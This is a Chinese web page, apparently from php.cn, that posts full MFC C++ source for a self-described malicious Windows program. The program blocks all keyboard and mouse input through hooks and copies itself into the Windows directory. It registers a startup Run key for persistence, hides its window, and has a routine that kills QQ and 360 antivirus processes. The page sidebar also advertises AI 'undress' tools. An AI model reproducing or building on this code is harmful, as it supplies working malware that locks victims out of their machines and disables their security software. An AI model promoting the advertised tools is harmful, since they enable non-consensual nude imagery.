一个恶意程序
microsoft
r
run
software
windows
惡意
程式
<span //</span><span KeyBoardHookDialogDlg.cpp : implementation file
</span><span //
</span><span
#include </span><span "</span><span stdafx.h</span><span "</span><span
#include </span><span "</span><span KeyBoardHookDialog.h</span><span "</span><span
#include </span><span "</span><span KeyBoardHookDialogDlg.h</span><span "</span>
<span #define</span> REG_RUN "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"<span
#include </span><tlhelp32.h><span
#ifdef _DEBUG
</span><span #define</span> new DEBUG_NEW
<span #undef</span> THIS_FILE
<span static</span> <span char</span> THIS_FILE[] =<span __FILE__;
</span><span #endif</span>
<span //</span><span #pragma comment (lib,"KeyBoardHook")</span>
<span ///////////////////////////////////////////////////////////////////////////</span><span //</span>
<span //</span><span CAboutDlg dialog used for App About
</span><span //</span><span 定义全局HHOOK变量,用于保存</span>
<span HHOOK g_hMouse;
HHOOK g_hKeyboard;
</span><span bool</span> isTrue = <span false</span><span ;
HWND hWnd; </span><span //</span><span 保存当前句柄
</span><span //</span><span 注意以下俩个钩子过程是全局函数,所以里面的API要用全局的</span>
<span LRESULT CALLBACK MouseProc(
</span><span int</span> nCode, <span //</span><span hook code</span>
WPARAM wParam, <span //</span><span message identifier</span>
LPARAM lParam <span //</span><span mouse coordinates</span>
<span )
{
</span><span return</span> <span 1</span><span ;
}
LRESULT CALLBACK KeyboardProc(
</span><span int</span> code, <span //</span><span hook code</span>
WPARAM wParam, <span //</span><span virtual-key code</span>
LPARAM lParam <span //</span><span keystroke-message information</span>
<span )
{
</span><span //</span><span if(VK_SPACE == wParam || VK_RETURN == wParam) </span><span //</span><span 屏蔽空格和回车键</span>
<span /*</span><span if(VK_F4 == wParam && (lParam>>29 & 1)) //屏蔽ALT + F4键
return 1;
else
return CallNextHookEx(g_hKeyboard,code,wParam,lParam);</span><span */</span>
<span //</span><span 留个后门,使当按下F2键时,程序将退</span>
<span if</span>(VK_F2 ==<span wParam)
{
</span><span //</span><span 调用全局API函数向程序发出关闭消息</span>
::SendMessage(hWnd,WM_CLOSE,<span 0</span>,<span 0</span><span );
</span><span //</span><span 卸载钩子</span>
<span UnhookWindowsHookEx(g_hMouse);
UnhookWindowsHookEx(g_hKeyboard);
}
</span><span return</span> <span 1</span><span ;
}
</span><span class</span> CAboutDlg : <span public</span><span CDialog
{
</span><span public</span><span :
CAboutDlg();
</span><span //</span><span Dialog Data
</span><span //</span><span {{AFX_DATA(CAboutDlg)</span>
<span enum</span> { IDD =<span IDD_ABOUTBOX };
</span><span //</span><span }}AFX_DATA
</span><span //</span><span ClassWizard generated virtual function overridesf
</span><span //</span><span {{AFX_VIRTUAL(CAboutDlg)</span>
<span protected</span><span :
</span><span virtual</span> <span void</span> DoDataExchange(CDataExchange* pDX); <span //</span><span DDX/DDV support
</span><span //</span><span }}AFX_VIRTUAL
</span><span //</span><span Implementation</span>
<span protected</span><span :
</span><span //</span><span {{AFX_MSG(CAboutDlg)
</span><span //</span><span }}AFX_MSG</span>
<span DECLARE_MESSAGE_MAP()
};
CAboutDlg::CAboutDlg() : CDialog(CAboutDlg::IDD)
{
</span><span //</span><span {{AFX_DATA_INIT(CAboutDlg)
</span><span //</span><span }}AFX_DATA_INIT</span>
<span }
</span><span void</span> CAboutDlg::DoDataExchange(CDataExchange*<span pDX)
{
CDialog::DoDataExchange(pDX);
</span><span //</span><span {{AFX_DATA_MAP(CAboutDlg)
</span><span //</span><span }}AFX_DATA_MAP</span>
<span }
BEGIN_MESSAGE_MAP(CAboutDlg, CDialog)
</span><span //</span><span {{AFX_MSG_MAP(CAboutDlg)
</span><span //</span><span No message handlers
</span><span //</span><span }}AFX_MSG_MAP</span>
<span END_MESSAGE_MAP()
</span><span ///////////////////////////////////////////////////////////////////////////</span><span //</span>
<span //</span><span CKeyBoardHookDialogDlg dialog</span>
<span
CKeyBoardHookDialogDlg::CKeyBoardHookDialogDlg(CWnd</span>* pParent <span /*</span><span =NULL</span><span */</span><span )
: CDialog(CKeyBoardHookDialogDlg::IDD, pParent)
{
</span><span //</span><span {{AFX_DATA_INIT(CKeyBoardHookDialogDlg)
</span><span //</span><span NOTE: the ClassWizard will add member initialization here
</span><span //</span><span }}AFX_DATA_INIT
</span><span //</span><span Note that LoadIcon does not require a subsequent DestroyIcon in Win32</span>
m_hIcon = AfxGetApp()-><span LoadIcon(IDR_MAINFRAME);
}
</span><span void</span> CKeyBoardHookDialogDlg::DoDataExchange(CDataExchange*<span pDX)
{
CDialog::DoDataExchange(pDX);
</span><span //</span><span {{AFX_DATA_MAP(CKeyBoardHookDialogDlg)
</span><span //</span><span NOTE: the ClassWizard will add DDX and DDV calls here
</span><span //</span><span }}AFX_DATA_MAP</span>
<span }
BEGIN_MESSAGE_MAP(CKeyBoardHookDialogDlg, CDialog)
</span><span //</span><span {{AFX_MSG_MAP(CKeyBoardHookDialogDlg)</span>
<span ON_WM_SYSCOMMAND()
ON_WM_PAINT()
ON_WM_QUERYDRAGICON()
ON_BN_CLICKED(IDC_BTN_HOOKON, OnBtnHookon)
ON_WM_TIMER()
</span><span //</span><span }}AFX_MSG_MAP</span>
<span END_MESSAGE_MAP()
</span><span ///////////////////////////////////////////////////////////////////////////</span><span //</span>
<span //</span><span CKeyBoardHookDialogDlg message handlers</span>
<span
BOOL CKeyBoardHookDialogDlg::OnInitDialog()
{
CDialog::OnInitDialog();
</span><span //</span><span Add "About..." menu item to system menu.
</span><span //</span><span IDM_ABOUTBOX must be in the system command range.</span>
ASSERT((IDM_ABOUTBOX & <span 0xFFF0</span>) ==<span IDM_ABOUTBOX);
ASSERT(IDM_ABOUTBOX </span>< <span 0xF000</span><span );
CMenu</span>* pSysMenu =<span GetSystemMenu(FALSE);
</span><span if</span> (pSysMenu !=<span NULL)
{
CString strAboutMenu;
strAboutMenu.LoadString(IDS_ABOUTBOX);
</span><span if</span> (!<span strAboutMenu.IsEmpty())
{
pSysMenu</span>-><span AppendMenu(MF_SEPARATOR);
pSysMenu</span>-><span AppendMenu(MF_STRING, IDM_ABOUTBOX, strAboutMenu);
}
}
</span><span //</span><span Set the icon for this dialog. The framework does this automatically
</span><span //</span><span when the application's main window is not a dialog</span>
SetIcon(m_hIcon, TRUE); <span //</span><span Set big icon</span>
SetIcon(m_hIcon, FALSE); <span //</span><span Set small icon
</span><span //</span><span TODO: Add extra initialization here</span>
<span
CopySelf();
autoRun();</span><span //</span><span 注册表启动
</span><span //</span><span 设定钩子
</span><span //</span><span ShowProcess();</span>
g_hMouse =<span SetWindowsHookEx(WH_MOUSE,MouseProc,NULL,GetCurrentThreadId());
g_hKeyboard </span>=<span SetWindowsHookEx(WH_KEYBOARD,KeyboardProc,NULL,GetCurrentThreadId());
</span><span //</span><span 保存句柄</span>
hWnd =<span m_hWnd;
SetTimer(</span><span 1</span>, <span 2000</span><span , NULL);
isTrue </span>= <span true</span><span ;
</span><span return</span> TRUE; <span //</span><span return TRUE unless you set the focus to a control</span>
<span }
</span><span void</span><span CKeyBoardHookDialogDlg::OnSysCommand(UINT nID, LPARAM lParam)
{
</span><span if</span> ((nID & <span 0xFFF0</span>) ==<span IDM_ABOUTBOX)
{
CAboutDlg dlgAbout;
dlgAbout.DoModal();
}
</span><span else</span><span
{
CDialog::OnSysCommand(nID, lParam);
}
}
</span><span //</span><span If you add a minimize button to your dialog, you will need the code below
</span><span //</span><span to draw the icon. For MFC applications using the document/view model,
</span><span //</span><span this is automatically done for you by the framework.</span>
<span void</span><span CKeyBoardHookDialogDlg::OnPaint()
{
</span><span if</span><span (IsIconic())
{
CPaintDC dc(</span><span this</span>); <span //</span><span device context for painting</span>
<span
SendMessage(WM_ICONERASEBKGND, (WPARAM) dc.GetSafeHdc(), </span><span 0</span><span );
</span><span //</span><span Center icon in client rectangle</span>
<span int</span> cxIcon =<span GetSystemMetrics(SM_CXICON);
</span><span int</span> cyIcon =<span GetSystemMetrics(SM_CYICON);
CRect rect;
GetClientRect(</span>&<span rect);
</span><span int</span> x = (rect.Width() - cxIcon + <span 1</span>) / <span 2</span><span ;
</span><span int</span> y = (rect.Height() - cyIcon + <span 1</span>) / <span 2</span><span ;
</span><span //</span><span Draw the icon</span>
<span dc.DrawIcon(x, y, m_hIcon);
}
</span><span else</span><span
{
CDialog::OnPaint();
}
}
</span><span //</span><span The system calls this to obtain the cursor to display while the user drags
</span><span //</span><span the minimized window.</span>
<span HCURSOR CKeyBoardHookDialogDlg::OnQueryDragIcon()
{
</span><span return</span><span (HCURSOR) m_hIcon;
}
</span><span void</span><span CKeyBoardHookDialogDlg::OnBtnHookon()
{
</span><span //</span><span TODO: Add your control notification handler code here</span>
<span
}
</span><span //</span><span DEL void CKeyBoardHookDialogDlg::OnBtnHookoff()
</span><span //</span><span DEL {
</span><span //</span><span DEL </span><span //</span><span TODO: Add your control notification handler code here
</span><span //</span><span DEL SetHookOff();
</span><span //</span><span DEL
</span><span //</span><span DEL }</span>
<span void</span><span CKeyBoardHookDialogDlg::hide()
{
ShowWindow(SW_HIDE);
}
</span><span void</span><span CKeyBoardHookDialogDlg::autoRun()
{
HKEY hKey </span>=<span NULL;
LONG lRet </span>= RegOpenKey(HKEY_LOCAL_MACHINE,REG_RUN,&<span hKey);
</span><span if</span>(lRet !=<span ERROR_SUCCESS)
{
</span><span return</span><span ;
}
RegSetValueEx(hKey,</span><span "</span><span mynona</span><span "</span>,NULL,REG_SZ,(<span const</span> unsigned <span char</span> *)&<span szWindowsPath,
strlen(szWindowsPath) </span>+<span sizeof</span>(<span char</span><span ));
RegCloseKey(hKey);
}
</span><span void</span><span CKeyBoardHookDialogDlg::ShowProcess()
{
HANDLE hSnap </span>=<span CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);
</span><span //</span><span ...</span>
<span
PROCESSENTRY32 Pe32 </span>= {<span 0</span><span };
Pe32.dwSize </span>= <span sizeof</span><span (PROCESSENTRY32);
</span><span int</span> bRet = Process32First(hSnap,&<span Pe32);
</span><span //</span><span 360IOSMgrSrv 360tray </span>
<span char</span> name[MAX_PATH] = <span "</span><span QQ.exe</span><span "</span><span ;
</span><span char</span> name2[MAX_PATH] = <span "</span><span 360tray.exe</span><span "</span><span ;
</span><span char</span> name3[MAX_PATH] = <span "</span><span 360rp.exe</span><span "</span><span ;
</span><span while</span><span (bRet)
{
</span><span //</span><span ...</span>
bRet = Process32Next(hSnap,&<span Pe32);
</span><span //</span><span cout<<"id:"<<Pe32.th32ProcessID<<" name:"<<Pe32.szExeFile<<endl;</span>
<span int</span> flag = <span 0</span><span ;
</span><span if</span>(strcmp(Pe32.szExeFile,name) == <span 0</span> || strcmp(Pe32.szExeFile,name3) == <span 0</span> || strcmp(Pe32.szExeFile,name2) ==<span 0</span><span )
flag </span>= <span 1</span><span ;
</span><span if</span><span (flag){
</span><span //</span><span cout<<"----------------------"<<Pe32.th32ProcessID<<endl;</span>
<span MessageBox(Pe32.szExeFile);
HANDLE hProcess </span>=<span OpenProcess(PROCESS_TERMINATE,FALSE,Pe32.th32ProcessID);
LPDWORD lpExitCode </span>= <span 0</span><span ;
GetExitCodeProcess(hProcess, lpExitCode);
TerminateProcess(hProcess, (UINT)lpExitCode);
}
}
}
</span><span void</span><span CKeyBoardHookDialogDlg::CopySelf()
{
</span><span char</span> szSelfName[MAX_PATH] = {<span 0</span><span };
</span><span //</span><span char szSystemPath[MAX_PATH] = {0};</span>
<span char</span> szTmpPath[MAX_PATH] = {<span 0</span><span };
</span><span //</span><span 获取当前程序自身路径</span>
<span GetModuleFileName(NULL,szSelfName,MAX_PATH);
</span><span //</span><span cout<<"szSelfName:"<<szSelfName<<endl;
</span><span //</span><span 获取系统目录</span>
<span GetWindowsDirectory(szWindowsPath,MAX_PATH);
</span><span //</span><span cout<<"szWindowsPath:"<<szWindowsPath<<endl;
</span><span //</span><span 获取windows目录
</span><span //</span><span GetSystemDirectory(szSystemPath,MAX_PATH);
</span><span //</span><span cout<<"szSystemPath:"<<szSystemPath<<endl;</span>
<span
strcat(szWindowsPath,</span><span "</span><span \\mynona.exe</span><span "</span><span );
</span><span //</span><span strcat(szSystemPath,"\\mynona.exe");</span>
<span
MessageBox( szWindowsPath,</span><span "</span><span : szWindowsPath</span><span "</span><span );
</span><span //</span><span MessageBox( szSystemPath,": szSystemPath"); </span>
<span int</span> isTrue = CopyFile(szSelfName,szWindowsPath,FALSE);<span //</span><span FALSE表示强行覆盖原有文件
</span><span //</span><span int isTrue2 = CopyFile(szSelfName,szSystemPath,FALSE);</span>
<span
}
</span><span void</span><span CKeyBoardHookDialogDlg::OnTimer(UINT nIDEvent)
{
</span><span //</span><span TODO: Add your message handler code here and/or call default</span>
<span if</span><span (isTrue){
ShowWindow(SW_HIDE);
}
MessageBox(</span><span "</span><span haha</span><span "</span>,<span "</span><span 哈哈</span><span "</span><span ,MB_ICONSTOP);
CDialog::OnTimer(nIDEvent);
}</span>登入後複製
本網站聲明
本文內容由網友自願投稿,版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容,請聯絡admin@php.cn
熱AI工具
Undresser.AI Undress
人工智慧驅動的應用程序,用於創建逼真的裸體照片
AI Clothes Remover
用於從照片中去除衣服的線上人工智慧工具。
Undress AI Tool
免費脫衣圖片
Clothoff.io
AI脫衣器
Video Face Swap
使用我們完全免費的人工智慧換臉工具,輕鬆在任何影片中換臉!
熱門文章
<🎜>:種植花園 - 完整的突變指南
3 週前
By DDD
<🎜>:泡泡膠模擬器無窮大 - 如何獲取和使用皇家鑰匙
3 週前
By 尊渡假赌尊渡假赌尊渡假赌
如何修復KB5055612無法在Windows 10中安裝?
3 週前
By DDD
北端:融合系統,解釋
3 週前
By 尊渡假赌尊渡假赌尊渡假赌
Mandragora:巫婆樹的耳語 - 如何解鎖抓鉤
3 週前
By 尊渡假赌尊渡假赌尊渡假赌
熱工具
記事本++7.3.1
好用且免費的程式碼編輯器
SublimeText3漢化版
中文版,非常好用
禪工作室 13.0.1
強大的PHP整合開發環境
Dreamweaver CS6
視覺化網頁開發工具
SublimeText3 Mac版
神級程式碼編輯軟體(SublimeText3)
vs code 可以在 Windows 8 中運行嗎
Apr 15, 2025 pm 07:24 PM
VS Code可以在Windows 8上運行,但體驗可能不佳。首先確保系統已更新到最新補丁,然後下載與系統架構匹配的VS Code安裝包,按照提示安裝。安裝後,注意某些擴展程序可能與Windows 8不兼容,需要尋找替代擴展或在虛擬機中使用更新的Windows系統。安裝必要的擴展,檢查是否正常工作。儘管VS Code在Windows 8上可行,但建議升級到更新的Windows系統以獲得更好的開發體驗和安全保障。
Debian中Tigervnc支持哪些操作系統
Apr 12, 2025 pm 10:15 PM
開源VNC工具Tigervnc兼容眾多操作系統,其中包括Windows、Linux和macOS。本文將詳細介紹Tigervnc在Debian系統上的應用情況。 Tigervnc在Debian系統的應用系統集成:在Debian系統中,Tigervnc作為VNC服務器組件被集成到系統中。用戶可通過命令行工具(例如vncserver)啟動VNC服務,並自定義顯示設置,如分辨率和色彩深度。跨平台連接:Tigervnc客戶端支持Windows、Linux和macOS,這意味著用戶可以從任何運行這
sublime寫好代碼後如何運行
Apr 16, 2025 am 08:51 AM
在 Sublime 中運行代碼的方法有六種:通過熱鍵、菜單、構建系統、命令行、設置默認構建系統和自定義構建命令,並可通過右鍵單擊項目/文件運行單個文件/項目,構建系統可用性取決於 Sublime Text 的安裝情況。
laravel安裝代碼
Apr 18, 2025 pm 12:30 PM
要安裝 Laravel,需依序進行以下步驟:安裝 Composer(適用於 macOS/Linux 和 Windows)安裝 Laravel 安裝器創建新項目啟動服務訪問應用程序(網址:http://127.0.0.1:8000)設置數據庫連接(如果需要)
如何解決Laravel中復雜的BelongsToThrough關係問題?使用Composer可以!
Apr 17, 2025 pm 09:54 PM
在Laravel開發中,處理複雜的模型關係一直是個挑戰,特別是當涉及到多層級的BelongsToThrough關係時。最近,我在處理一個多級模型關係的項目中遇到了這個問題,傳統的HasManyThrough關係無法滿足需求,導致數據查詢變得複雜且低效。經過一番探索,我找到了staudenmeir/belongs-to-through這個庫,它通過Composer輕鬆安裝並解決了我的困擾。
Mac系統中的系統維護與優化工具推薦
Apr 12, 2025 pm 04:45 PM
Mac 系統維護包括:磁盤管理(使用 OmniDiskSweeper 清理磁盤空間,用磁盤工具檢查磁盤錯誤)內存管理(用 Activity Monitor 監控內存佔用,結束佔用過高的進程)啟動項管理(用 Linc 或 LaunchControl 管理啟動項,禁用不必要的啟動項)系統緩存清理(用 CleanMyMac X 或手動清理系統緩存)軟件更新(及時更新系統和應用程序)定期備份(使用 Time Machine 定期備份數據)良好使用習慣(不過度安裝應用程序,定期清理文件,監控系統日誌)
vscode 無法安裝擴展
Apr 15, 2025 pm 07:18 PM
VS Code擴展安裝失敗的原因可能包括:網絡不穩定、權限不足、系統兼容性問題、VS Code版本過舊、殺毒軟件或防火牆干擾。通過檢查網絡連接、權限、日誌文件、更新VS Code、禁用安全軟件以及重啟VS Code或計算機,可以逐步排查和解決問題。
